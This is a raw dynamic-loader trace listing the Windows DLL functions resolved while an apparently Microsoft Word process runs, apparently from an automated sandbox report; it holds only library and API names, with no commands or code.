DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: SAMLIB.dll/SamEnumerateDomainsInSamServer
DynamicLoader: SAMLIB.dll/SamLookupDomainInSamServer
DynamicLoader: SAMLIB.dll/SamFreeMemory
DynamicLoader: SAMLIB.dll/SamOpenDomain
DynamicLoader: ADVAPI32.dll/LsaOpenPolicy
DynamicLoader: ADVAPI32.dll/LsaLookupNames2
DynamicLoader: ADVAPI32.dll/LsaClose
DynamicLoader: ADVAPI32.dll/LsaFreeMemory
DynamicLoader: SAMLIB.dll/SamGetAliasMembership
DynamicLoader: SAMLIB.dll/SamLookupIdsInDomain
DynamicLoader: SAMLIB.dll/SamCloseHandle
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: urlmon.dll/CoInternetIsFeatureEnabled
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: propsys.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/InitPropVariantFromStringAsVector
DynamicLoader: propsys.dll/PSCoerceToCanonicalValue
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: WININET.dll/InternetCrackUrlA
DynamicLoader: UxTheme.dll/EnableThemeDialogTexture
DynamicLoader: comctl32.dll/RegisterClassNameW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: urlmon.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: UxTheme.dll/BufferedPaintStopAllAnimations
DynamicLoader: UxTheme.dll/BufferedPaintUnInit
DynamicLoader: ole32.dll/RevokeDragDrop
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: IEShims.dll/IEShims_GetOriginatingThreadId
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: urlmon.dll/
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: ADVAPI32.dll/SaferiIsExecutableFileType
DynamicLoader: winshfhc.dll/
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ADVAPI32.dll/TraceMessage
DynamicLoader: ADVAPI32.dll/TraceMessageVa
DynamicLoader: MPCLIENT.DLL/MpManagerOpen
DynamicLoader: MPCLIENT.DLL/MpHandleClose
DynamicLoader: MPCLIENT.DLL/MpFreeMemory
DynamicLoader: MPCLIENT.DLL/MpScanStart
DynamicLoader: MPCLIENT.DLL/MpScanResult
DynamicLoader: MPCLIENT.DLL/MpThreatOpen
DynamicLoader: MPCLIENT.DLL/MpThreatEnumerate
DynamicLoader: MPCLIENT.DLL/MpConfigOpen
DynamicLoader: MPCLIENT.DLL/MpConfigGetValue
DynamicLoader: MPCLIENT.DLL/MpConfigClose
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: propsys.dll/PSPropertyBag_WriteDWORD
DynamicLoader: propsys.dll/PSPropertyBag_ReadDWORD
DynamicLoader: propsys.dll/PSPropertyBag_ReadBSTR
DynamicLoader: propsys.dll/PSPropertyBag_ReadStrAlloc
DynamicLoader: propsys.dll/
DynamicLoader: ADVAPI32.dll/TraceMessage
DynamicLoader: ADVAPI32.dll/TraceMessageVa
DynamicLoader: MPCLIENT.DLL/MpManagerOpen
DynamicLoader: MPCLIENT.DLL/MpHandleClose
DynamicLoader: MPCLIENT.DLL/MpFreeMemory
DynamicLoader: MPCLIENT.DLL/MpScanStart
DynamicLoader: MPCLIENT.DLL/MpScanResult
DynamicLoader: MPCLIENT.DLL/MpThreatOpen
DynamicLoader: MPCLIENT.DLL/MpThreatEnumerate
DynamicLoader: MPCLIENT.DLL/MpConfigOpen
DynamicLoader: MPCLIENT.DLL/MpConfigGetValue
DynamicLoader: MPCLIENT.DLL/MpConfigClose
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: ole32.dll/CoTaskMemRealloc
DynamicLoader: ole32.dll/CoAllowSetForegroundWindow
DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation
DynamicLoader: ADVAPI32.dll/CommandLineFromMsiDescriptor
DynamicLoader: msiltcfg.dll/MsiSetInternalUI
DynamicLoader: msiltcfg.dll/MsiConfigureProductExW
DynamicLoader: msiltcfg.dll/MsiProvideComponentFromDescriptorW
DynamicLoader: msiltcfg.dll/MsiDecomposeDescriptorW
DynamicLoader: msiltcfg.dll/MsiGetProductInfoW
DynamicLoader: msiltcfg.dll/MsiAdvertiseScriptW
DynamicLoader: msiltcfg.dll/MsiQueryProductStateW
DynamicLoader: msiltcfg.dll/MsiIsProductElevatedW
DynamicLoader: msiltcfg.dll/MsiReinstallProductW
DynamicLoader: USER32.dll/MsgWaitForMultipleObjects
DynamicLoader: USER32.dll/PeekMessageW
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetProcessWindowStation
DynamicLoader: USER32.dll/CloseWindowStation
DynamicLoader: USER32.dll/GetUserObjectInformationW
DynamicLoader: msi.dll/MsiDecomposeDescriptorW
DynamicLoader: msi.dll/MsiGetComponentPathW
DynamicLoader: msi.dll/MsiGetProductInfoW
DynamicLoader: msi.dll/MsiProvideComponentFromDescriptorW
DynamicLoader: msi.dll/MsiQueryFeatureStateW
DynamicLoader: msi.dll/MsiQueryFeatureStateFromDescriptorW
DynamicLoader: msi.dll/MsiSetInternalUI
DynamicLoader: msi.dll/MsiAdvertiseScriptW
DynamicLoader: msi.dll/MsiQueryProductStateW
DynamicLoader: msi.dll/MsiIsProductElevatedW
DynamicLoader: msi.dll/MsiReinstallProductW
DynamicLoader: msi.dll/MsiConfigureProductExW
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: SFC.DLL/SfcIsKeyProtected
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: SXS.DLL/CreateAssemblyNameObject
DynamicLoader: SXS.DLL/CreateAssemblyCache
DynamicLoader: SFC.DLL/SfcIsFileProtected
DynamicLoader: SETUPAPI.dll/PnpIsFilePnpDriver
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: apphelp.dll/AllowPermLayer
DynamicLoader: kernel32.dll/BaseIsAppcompatInfrastructureDisabled
DynamicLoader: apphelp.dll/SdbInitDatabase
DynamicLoader: apphelp.dll/SdbGetMatchingExe
DynamicLoader: apphelp.dll/SdbReleaseDatabase
DynamicLoader: MPR.dll/WNetGetConnectionW
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoA
DynamicLoader: urlmon.dll/CoInternetQueryInfo
DynamicLoader: WININET.dll/CommitUrlCacheEntryA
DynamicLoader: WININET.dll/SetUrlCacheEntryInfoW
DynamicLoader: USER32.dll/PostQuitMessage
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: USER32.dll/UnregisterClassW
DynamicLoader: RPCRT4.dll/RpcEpUnregister
DynamicLoader: RPCRT4.dll/RpcBindingVectorFree
DynamicLoader: RPCRT4.dll/RpcServerUnregisterIf
DynamicLoader: IEShims.dll/IEShims_Uninitialize
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ntdll.dll/LdrUnregisterDllNotification
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/GetModuleHandleExW
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: wwlib.dll/FMain
DynamicLoader: wwlib.dll/wdCommandDispatch
DynamicLoader: wwlib.dll/wdGetApplicationObject
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: apphelp.dll/ApphelpCheckRunAppEx
DynamicLoader: apphelp.dll/ApphelpQueryModuleDataEx
DynamicLoader: apphelp.dll/ApphelpParseModuleData
DynamicLoader: apphelp.dll/ApphelpCreateAppcompatData
DynamicLoader: apphelp.dll/SdbInitDatabaseEx
DynamicLoader: apphelp.dll/SdbReleaseDatabase
DynamicLoader: apphelp.dll/SdbUnpackAppCompatData
DynamicLoader: apphelp.dll/SdbQueryContext
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: kernel32.dll/InitializeSListHead
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetLongPathNameA
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: kernel32.dll/RegisterApplicationRecoveryCallback
DynamicLoader: kernel32.dll/ApplicationRecoveryInProgress
DynamicLoader: kernel32.dll/ApplicationRecoveryFinished
DynamicLoader: kernel32.dll/RegisterApplicationRestart
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/WerRegisterFile
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/QueryThreadCycleTime
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/SetProcessDEPPolicy
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/GetCalendarInfoEx
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/EnumSystemLocalesEx
DynamicLoader: kernel32.dll/EnumCalendarInfoExEx
DynamicLoader: kernel32.dll/EnumDateFormatsExEx
DynamicLoader: kernel32.dll/EnumTimeFormatsEx
DynamicLoader: kernel32.dll/GetThreadUILanguage
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: IMM32.DLL/ImmDisableIME
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: UxTheme.DLL/IsThemeActive
DynamicLoader: UxTheme.DLL/OpenThemeData
DynamicLoader: UxTheme.DLL/CloseThemeData
DynamicLoader: UxTheme.DLL/DrawThemeBackground
DynamicLoader: UxTheme.DLL/DrawThemeEdge
DynamicLoader: UxTheme.DLL/DrawThemeText
DynamicLoader: UxTheme.DLL/GetThemeBackgroundContentRect
DynamicLoader: UxTheme.DLL/GetThemeBackgroundExtent
DynamicLoader: UxTheme.DLL/GetThemePartSize
DynamicLoader: UxTheme.DLL/GetThemeTextExtent
DynamicLoader: UxTheme.DLL/GetThemeTextMetrics
DynamicLoader: UxTheme.DLL/GetThemeBackgroundRegion
DynamicLoader: UxTheme.DLL/HitTestThemeBackground
DynamicLoader: UxTheme.DLL/DrawThemeIcon
DynamicLoader: UxTheme.DLL/IsThemePartDefined
DynamicLoader: UxTheme.DLL/IsThemeBackgroundPartiallyTransparent
DynamicLoader: UxTheme.DLL/GetThemeColor
DynamicLoader: UxTheme.DLL/GetThemeMetric
DynamicLoader: UxTheme.DLL/GetThemeString
DynamicLoader: UxTheme.DLL/GetThemeBool
DynamicLoader: UxTheme.DLL/GetThemeInt
DynamicLoader: UxTheme.DLL/GetThemeEnumValue
DynamicLoader: UxTheme.DLL/GetThemePosition
DynamicLoader: UxTheme.DLL/GetThemeFont
DynamicLoader: UxTheme.DLL/GetThemeRect
DynamicLoader: UxTheme.DLL/GetThemeMargins
DynamicLoader: UxTheme.DLL/GetThemeIntList
DynamicLoader: UxTheme.DLL/GetThemePropertyOrigin
DynamicLoader: UxTheme.DLL/SetWindowTheme
DynamicLoader: UxTheme.DLL/GetThemeFilename
DynamicLoader: UxTheme.DLL/GetThemeSysColor
DynamicLoader: UxTheme.DLL/GetThemeSysColorBrush
DynamicLoader: UxTheme.DLL/GetThemeSysSize
DynamicLoader: UxTheme.DLL/GetThemeSysBool
DynamicLoader: UxTheme.DLL/GetThemeSysFont
DynamicLoader: UxTheme.DLL/GetThemeSysInt
DynamicLoader: UxTheme.DLL/GetThemeSysString
DynamicLoader: UxTheme.DLL/IsAppThemed
DynamicLoader: UxTheme.DLL/GetWindowTheme
DynamicLoader: UxTheme.DLL/GetThemeAppProperties
DynamicLoader: UxTheme.DLL/SetThemeAppProperties
DynamicLoader: UxTheme.DLL/GetThemeDocumentationProperty
DynamicLoader: UxTheme.DLL/EnableThemeDialogTexture
DynamicLoader: UxTheme.DLL/GetCurrentThemeName
DynamicLoader: UxTheme.DLL/EnableTheming
DynamicLoader: UxTheme.DLL/DrawThemeParentBackground
DynamicLoader: UxTheme.DLL/DrawThemeTextEx
DynamicLoader: UxTheme.DLL/BeginPanningFeedback
DynamicLoader: UxTheme.DLL/UpdatePanningFeedback
DynamicLoader: UxTheme.DLL/EndPanningFeedback
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: riched20.dll/REMSOHInst
DynamicLoader: riched20.dll/REExtendedRegisterClass
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: USER32.dll/ChangeWindowMessageFilter
DynamicLoader: USER32.dll/AddClipboardFormatListener
DynamicLoader: USER32.dll/RemoveClipboardFormatListener
DynamicLoader: USER32.dll/GetUpdatedClipboardFormats
DynamicLoader: mscoree.dll/GetRequestedRuntimeInfo
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/GetRequestedRuntimeInfo_RetAddr
DynamicLoader: mscoreei.dll/GetRequestedRuntimeInfo
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: mscoree.dll/LockClrVersion
DynamicLoader: mscoree.dll/CLRCreateInstance
DynamicLoader: mscoreei.dll/LockClrVersion_RetAddr
DynamicLoader: mscoreei.dll/LockClrVersion
DynamicLoader: mscoreei.dll/CLRCreateInstance
DynamicLoader: ole32.dll/OleLoadFromStream
DynamicLoader: OLEAUT32.dll/SysAllocStringByteLen
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/VariantChangeType
DynamicLoader: OLEAUT32.dll/VariantClear
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OSPPC.DLL/SLClose
DynamicLoader: OSPPC.DLL/SLConsumeRight
DynamicLoader: OSPPC.DLL/SLGetPKeyId
DynamicLoader: OSPPC.DLL/SLGetPolicyInformation
DynamicLoader: OSPPC.DLL/SLGetApplicationPolicy
DynamicLoader: OSPPC.DLL/SLGetLicensingStatusInformation
DynamicLoader: OSPPC.DLL/SLLoadApplicationPolicies
DynamicLoader: OSPPC.DLL/SLOpen
DynamicLoader: OSPPC.DLL/SLPersistApplicationPolicies
DynamicLoader: OSPPC.DLL/SLUnloadApplicationPolicies
DynamicLoader: OSPPC.DLL/SLGetProductSkuInformation
DynamicLoader: OSPPC.DLL/SLInstallProofOfPurchase
DynamicLoader: OSPPC.DLL/SLInstallLicense
DynamicLoader: OSPPC.DLL/SLRegisterPlugin
DynamicLoader: OSPPC.DLL/SLUninstallProofOfPurchase
DynamicLoader: OSPPC.DLL/SLGetPKeyInformation
DynamicLoader: OSPPC.DLL/SLGetSLIDList
DynamicLoader: OSPPC.DLL/SLGenerateOfflineInstallationId
DynamicLoader: OSPPC.DLL/SLDepositOfflineConfirmationId
DynamicLoader: OSPPC.DLL/SLPersistRTSPayloadOverride
DynamicLoader: OSPPC.DLL/SLSetAuthenticationData
DynamicLoader: OSPPC.DLL/SLGetAuthenticationResult
DynamicLoader: OSPPC.DLL/SLGetServiceInformation
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Comctl32.dll/SetWindowSubclass
DynamicLoader: Comctl32.dll/DefSubclassProc
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Winspool.DRV/GetPrinterW
DynamicLoader: Winspool.DRV/GetPrinterA
DynamicLoader: Winspool.DRV/DeviceCapabilitiesW
DynamicLoader: Winspool.DRV/DeviceCapabilitiesA
DynamicLoader: Winspool.DRV/OpenPrinterW
DynamicLoader: Winspool.DRV/OpenPrinterA
DynamicLoader: Winspool.DRV/DocumentPropertiesW
DynamicLoader: Winspool.DRV/DocumentPropertiesA
DynamicLoader: Winspool.DRV/EnumPrintersA
DynamicLoader: Winspool.DRV/EnumJobsA
DynamicLoader: Winspool.DRV/GetPrinterDriverA
DynamicLoader: Winspool.DRV/ClosePrinter
DynamicLoader: Winspool.DRV/EnumPrintersW
DynamicLoader: Winspool.DRV/EnumJobsW
DynamicLoader: Winspool.DRV/GetPrinterDriverW
DynamicLoader: Winspool.DRV/AddPrinterDriverA
DynamicLoader: Winspool.DRV/AddPrinterDriverW
DynamicLoader: Winspool.DRV/GetPrinterDriverDirectoryA
DynamicLoader: Winspool.DRV/GetPrinterDriverDirectoryW
DynamicLoader: Winspool.DRV/DeletePrinter
DynamicLoader: Winspool.DRV/AddPrinterA
DynamicLoader: Winspool.DRV/AddPrinterW
DynamicLoader: Winspool.DRV/AddPrinterConnectionW
DynamicLoader: Winspool.DRV/GetDefaultPrinterW
DynamicLoader: Winspool.DRV/StartDocPrinterW
DynamicLoader: Winspool.DRV/EndDocPrinter
DynamicLoader: Winspool.DRV/StartPagePrinter
DynamicLoader: Winspool.DRV/EndPagePrinter
DynamicLoader: Winspool.DRV/WritePrinter
DynamicLoader: Winspool.DRV/IsValidDevmodeW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SHELL32.DLL/SHGetDesktopFolder
DynamicLoader: SHELL32.DLL/SHGetMalloc
DynamicLoader: SHELL32.DLL/SHGetPathFromIDList
DynamicLoader: SHELL32.DLL/SHGetPathFromIDListW
DynamicLoader: SHELL32.DLL/SHGetDataFromIDListA
DynamicLoader: SHELL32.DLL/SHGetDataFromIDListW
DynamicLoader: SHELL32.DLL/SHBrowseForFolderA
DynamicLoader: SHELL32.DLL/SHBrowseForFolderW
